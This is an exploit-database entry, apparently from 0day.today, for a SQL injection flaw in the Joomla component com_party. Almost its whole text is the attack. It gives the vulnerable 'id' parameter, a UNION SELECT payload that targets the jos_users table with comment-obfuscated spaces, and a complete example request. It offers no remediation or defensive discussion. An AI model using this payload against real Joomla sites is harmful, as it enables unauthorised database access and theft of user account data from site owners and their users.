id: 11273
date: 03/12/2010
title: Joomla Component com_party SQL Injection Vulnerability
author: DevilZ TM
cves: 

======================================================
Joomla Component com_party SQL Injection Vulnerability 
======================================================

[~]######################################### ExploiT #################################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_party&view=party&task=details&id=[SQL]
  
[~] ExploiT         :
  
-1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/*
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_party&view=party&task=details&id=-1/**/UNION/**/SELECT/**/1/**/FROM/**/jos_users/*



#  0day.today [2023-03-24]  #